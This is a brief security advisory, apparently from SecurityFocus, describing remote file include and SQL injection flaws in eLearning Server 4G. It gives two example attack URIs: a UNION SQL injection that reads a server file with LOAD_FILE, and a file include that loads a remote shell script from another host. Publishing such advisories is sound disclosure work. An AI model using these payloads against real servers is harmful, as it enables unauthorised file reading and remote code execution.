eLearning Server 4G Remote File Include and SQL Injection Vulnerabilities

An attacker can use a browser to exploit these issues.

The following example URIs are available:

http://www.example.com/news.php4?nid=-12'+union+select+1,2,LOAD_FILE('C:\\Program%20Files\\Hypermethod\\eLearningServer\\index.php'),4,5,6,7,8,9,10,11/*

http://www.example.com/admin/setup.inc.php?path=http://www.example2.com/shell.txt?


 

Privacy Statement
Copyright 2010, SecurityFocus